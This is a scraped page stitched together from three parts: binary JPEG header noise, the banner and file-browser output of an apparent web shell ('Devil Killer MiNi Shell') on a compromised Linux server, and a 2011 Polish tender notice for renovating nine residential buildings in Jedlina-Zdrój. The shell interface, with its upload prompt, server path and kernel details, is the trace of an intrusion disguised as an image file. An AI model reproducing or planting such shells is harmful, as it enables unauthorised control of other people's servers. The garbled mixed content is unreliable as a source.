JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111019/274361-N-2011.html

<p class="kh_header"><b>Jedlina-Zdrój: Rewitalizacja wielorodzinnych budynków mieszkalnych w uzdrowisku Jedlina-Zdrój. 
Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013
Priorytet 9 - Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta) 
Działanie 9.2 - Wsparcie dla przedsięwzięć w zakresie mieszkalnictwa w miastach poniżej 10 tysięcy mieszkańców.</b><br>
<b>Numer ogłoszenia: 274361 - 2011; data zamieszczenia: 19.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jedlina-Zdrój , ul. Poznańska 2, 58-330 Jedlina-Zdrój, woj. dolnośląskie, tel. 74  8455215; 8455216; 8855054, faks 74 8855269.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jedlinazdroj.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja wielorodzinnych budynków mieszkalnych w uzdrowisku Jedlina-Zdrój. 
Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013
Priorytet 9 - Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta) 
Działanie 9.2 - Wsparcie dla przedsięwzięć w zakresie mieszkalnictwa w miastach poniżej 10 tysięcy mieszkańców..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych trybie (zaprojektuj i wybuduj).  Zgodnie z wytycznymi Programu Funkcjonalno-Użytkowego, będącego załącznikiem nr 1 do SIWZ.
Przedmiot zamówienia podzielony jest na zadania. Wykonawca może złożyć ofertę na jedno lub kilka wybranych przez siebie zadań. 

1) Zadanie nr 5 - Budynek mieszkalny przy ul. Bolesława Chrobrego 21

Przedmiotem zamówienia dla zadania nr 5 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego i remontu kominów, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.

2) Zadanie nr 6  - Budynek mieszkalny przy ul. Bolesława Chrobrego 22 

Przedmiotem zamówienia dla zadania nr 6 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego i remontu kominów, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej w częściach wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.

3) Zadanie nr 7 - Budynek mieszkalny przy ul. Kłodzkiej 44 

Przedmiotem zamówienia dla zadania nr 7 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.

4) Zadanie nr 8 - Budynek mieszkalny przy ul. Stanisława Moniuszki 23 

Przedmiotem zamówienia dla zadania nr 8 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego i remontu podłogi strychu, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej, remontu instalacji sanitarnej w częściach wspólnych oraz remontu elewacji (bez docieplenia) wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.

5) Zadanie nr 9 - Budynek mieszkalny przy ul. Noworudzkiej 8

Przedmiotem zamówienia dla zadania nr 9 jest zaprojektowanie i wykonanie robót budowlanych zakresie remontu pokrycia dachowego, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.

6) Zadanie nr 10 - Budynek mieszkalny przy ul. Henryka Sienkiewicza 2 

Przedmiotem zamówienia dla zadania nr 10 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej, sanitarnej, wodociągowej i gazowej wraz z przyłączem w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.

7) Zadanie nr 11 - Budynek mieszkalny przy ul. Henryka Sienkiewicza 2A

Przedmiotem zamówienia dla zadania nr 11 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej, sanitarnej, wodociągowej i gazowej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.

8) Zadanie nr 12 - Budynek mieszkalny przy ul. Świdnickiej 15

Przedmiotem zamówienia dla zadania nr 12 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu podłóg strychu, remontu klatki schodowej oraz remontu instalacji elektrycznej, sanitarnej i wodociągowej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.

9) Zadanie nr 13 Budynek mieszkalny przy ul. Zakopiańskiej 3

Przedmiotem zamówienia dla zadania nr 13 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu klatki schodowej, remontu elewacji (malowanie) oraz remontu instalacji elektrycznej i sanitarnej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.

UWAGA: Wykonawca ma możliwość zapoznania się w siedzibie Zamawiającego z Programem Funkcjonalno - Użytkowym. Nie zapoznanie się z tym dokumentem stanowi ryzyko Wykonawcy. Zamawiający bezwzględnie wymaga, aby Wykonawca dokonał wizji lokalnej obiektów i zapoznał się z ich stanem faktycznym. Wykonawca ma dokonać niezbędnych pomiarów, sprawdzeń, wyliczeń i innych czynności niezbędnych do prawidłowego sporządzenia dokumentacji oraz wyceny robót do wykonania. Wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem kosztów lub pominięciem elementów niezbędnych do prawidłowego wykonania przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.26.19.10-6, 45.21.20.00-2, 45.22.00.00-9, 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium:
Wysokość wadium wynosi:
Dla zadania nr 5 - Budynek mieszkalny przy ul. Bolesława Chrobrego 21 - 2 900,00 zł
Dla zadania nr 6 - Budynek mieszkalny przy ul. Bolesława Chrobrego 22 - 3 300,00 zł
Dla zadania nr 7 - Budynek mieszkalny przy ul. Kłodzka 44 - 3 200,00 zł  
Dla zadania nr 8 - Budynek mieszkalny przy ul. St. Moniuszki 23 - 3 700,00 zł
Dla zadania nr 9 - Budynek mieszkalny przy ul. Noworudzkiej 8  - 4 800,00 zł
Dla zadania nr 10 - Budynek mieszkalny przy ul. H. Sienkiewicza 2 - 1 300,00 zł
Dla zadania nr 11 - Budynek mieszkalny przy ul. H. Sienkiewicza 2A - 3 000,00 zł 
Dla zadania nr 12 - Budynek mieszkalny przy ul. Świdnickiej 15 - 1 000,00 zł 
Dla zadania nr 13 - Budynek mieszkalny przy ul. Zakopiańskiej 3 - 3 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku  
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Za spełnienie tego warunku uzna złożenie oświadczenia, że na dzień składania ofert wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Pzp.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie przedmiotowe oświadczenie musi zostać złożone (podpisane) przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub oświadczenia złożone (podpisane) przez każdego z Wykonawców składających ofertę wspólną.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy powinni udokumentować: 
a) dla zadań: nr 5, 6, 7 i 9 - posiadanie wiedzy i doświadczenia przez wykazanie, że wykonali w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej jedno zadanie polegające na zaprojektowaniu i zrealizowaniu robót budowlanych w budynku mieszkalnym w zakresie remontu dachu oraz remontu instalacji elektrycznej. 
Do wykazu należy załączyć dokumenty potwierdzające, że zamówienia te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

b) dla zadania nr 8 - posiadanie wiedzy i doświadczenia przez wykazanie, że wykonali w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedno zadanie polegające na zaprojektowaniu i zrealizowaniu robót budowlanych w budynku mieszkalnym w zakresie remontu dachu, remontu elewacji oraz remontu instalacji sanitarnej. 
Do wykazu należy załączyć dokumenty potwierdzające, że zamówienia te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

c) dla zadania nr 10 -  posiadanie wiedzy i doświadczenia przez wykazanie, że wykonali w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie ,co najmniej jedno zadanie polegające na zaprojektowaniu i zrealizowaniu robót budowlanych w budynku mieszkalnym w zakresie remontu klatki schodowej oraz remontu instalacji sanitarnej, wodociągowej, elektrycznej i gazowej. 
Do wykazu należy załączyć dokumenty potwierdzające, że zamówienia te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

d) dla zadania nr 11 -  posiadanie wiedzy i doświadczenia przez wykazanie, że wykonali w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedno zadanie polegające na zaprojektowaniu i zrealizowaniu robót budowlanych w budynku mieszkalnym w zakresie remontu dachu oraz remontu instalacji elektrycznej, sanitarnej, wodociągowej i gazowej. 
Do wykazu należy załączyć dokumenty potwierdzające, że zamówienia te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

e) dla zadania nr 12 -  posiadanie wiedzy i doświadczenia przez wykazanie, że wykonali w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedno zadanie polegające na zaprojektowaniu i zrealizowaniu robót budowlanych w budynku mieszkalnym w zakresie remontu strychu, klatki schodowej oraz remontu instalacji sanitarnej, wodociągowej i elektrycznej. 
Do wykazu należy załączyć dokumenty potwierdzające, że zamówienia te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
 
f) dla zadania nr 13 -  posiadanie wiedzy i doświadczenia przez wykazanie, że wykonali w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedno zadanie polegające na zaprojektowaniu i zrealizowaniu robót budowlanych w budynku mieszkalnym w zakresie remontu klatki schodowej, remontu elewacji, remontu instalacji elektrycznej i sanitarnej. 
Do wykazu należy załączyć dokumenty potwierdzające, że zamówienia te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia, oceniane będą łączne kwalifikacje i doświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Za spełnienie tego warunku uzna złożenie oświadczenia, że na dzień składania ofert wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Pzp.

W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie przedmiotowe oświadczenie musi zostać złożone (podpisane) przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub oświadczenia złożone (podpisane) przez każdego z Wykonawców składających ofertę wspólną</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy muszą wykazać, że dysponują osobami zdolnymi do wykonania zamówienia - przy czym Zamawiający uzna ten warunek za spełniony, gdy Wykonawca wykaże, że będzie dysponował kadrą techniczną posiadającą stosowne uprawnienia do wykonywania czynności związanych z realizacją zamówienia, w tym mogącymi wykonywać samodzielne funkcje w budownictwie zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) tj.:

a) dla zadań nr 5, 6,7 i 9 - osobami przewidzianymi do pełnienia funkcji projektanta, kierownika budowy w specjalności konstrukcyjno-budowlanej, kierownika robót instalacyjnych w zakresie instalacji elektrycznej. 

b) dla zadania nr 8 - osobami przewidzianymi do pełnienia funkcji projektanta, kierownika budowy w specjalności konstrukcyjno-budowlanej, kierownika robót instalacyjnych w zakresie instalacji sanitarnej. 

f) dla zadania nr 10 - osobami przewidzianymi do pełnienia funkcji projektanta, kierownika budowy w specjalności konstrukcyjno-budowlanej, kierownika robót instalacyjnych w zakresie instalacji elektrycznej, sanitarnej, wodociągowej i gazowej.

g) dla zadania nr 11 - osobami przewidzianymi do pełnienia funkcji projektanta, kierownika budowy w specjalności konstrukcyjno-budowlanej, kierownika robót instalacyjnych w zakresie instalacji elektrycznej, sanitarnej, wodociągowej i gazowej.

h) dla zadania nr 12 - osobami przewidzianymi do pełnienia funkcji projektanta, kierownika budowy w specjalności konstrukcyjno-budowlanej, kierownika robót instalacyjnych w zakresie instalacji elektrycznej, sanitarnej i wodociągowej.

i) dla zadania nr 13 - osobami przewidzianymi do pełnienia funkcji projektanta, kierownika budowy w specjalności konstrukcyjno-budowlanej, kierownika robót instalacyjnych w zakresie instalacji elektrycznej i sanitarnej.

Wskazane osoby powinny posiadać wpis na listę członków właściwej izby samorządu zawodowego lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów przed 1 stycznia 1995r. 

Wykaz osób, które będą uczestniczyć w wykonywaniu każdego z poszczególnych części zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości i kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, należy złożyć wg wzoru formularza będącego załącznikiem nr 5 do SIWZ, dla każdego zadania osobno.
Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień należy złożyć wg wzoru formularza będącego załącznikiem nr 6 do SIWZ; dla każdego zadania osobno.

Zamawiający dopuszcza możliwość łączenia wszystkich funkcji przez jedną osobę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zamawiający uzna ten warunek za spełniony, gdy Wykonawca wykaże (a w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa) , że posiada:

a) dla zadania nr 5 - Budynek mieszkalny przy ul. Bolesława Chrobrego 21
- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę ubezpieczenia nie mniejszą niż 90 000,00 zł. W przypadku, gdy termin obowiązywania polisy lub innego dokumentu ubezpieczenia będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.  

- środki finansowe własne lub zdolność kredytową w wysokości nie mniejszej niż 50 000,00 zł. Na potwierdzenie niniejszego warunku Wykonawcy zobowiązani są przedłożyć informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

b) dla zadania nr 6 - Budynek mieszkalny przy ul. Bolesława Chrobrego 22
- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę ubezpieczenia nie mniejszą niż 100 000,00 zł. W przypadku, gdy termin obowiązywania polisy lub innego dokumentu ubezpieczenia będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.

- środki finansowe własne lub zdolność kredytową w wysokości nie mniejszej niż 50 000,00 zł. Na potwierdzenie niniejszego warunku Wykonawcy zobowiązani są przedłożyć informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

c) dla zadania nr 7 - Budynek mieszkalny przy ul. Kłodzka 44 
- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę ubezpieczenia nie mniejszą niż 100 000,00 zł. W przypadku, gdy termin obowiązywania polisy lub innego dokumentu ubezpieczenia będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.

- środki finansowe własne lub zdolność kredytową w wysokości nie mniejszej niż 50000,00 zł. Na potwierdzenie niniejszego warunku Wykonawcy zobowiązani są przedłożyć informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
dla zadania nr 8 - Budynek mieszkalny przy ul. St. Moniuszki 23
- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę ubezpieczenia nie mniejszą niż 120 000,00 zł. W przypadku, gdy termin obowiązywania polisy lub innego dokumentu ubezpieczenia będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.

- środki finansowe własne lub zdolność kredytową w wysokości nie mniejszej niż 50 000,00 zł. Na potwierdzenie niniejszego warunku Wykonawcy zobowiązani są przedłożyć informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
dla zadania nr 9 - Budynek mieszkalny przy ul. Noworudzkiej 8
- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę ubezpieczenia nie mniejszą niż  160 000,00 zł. W przypadku, gdy termin obowiązywania polisy lub innego dokumentu ubezpieczenia będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.

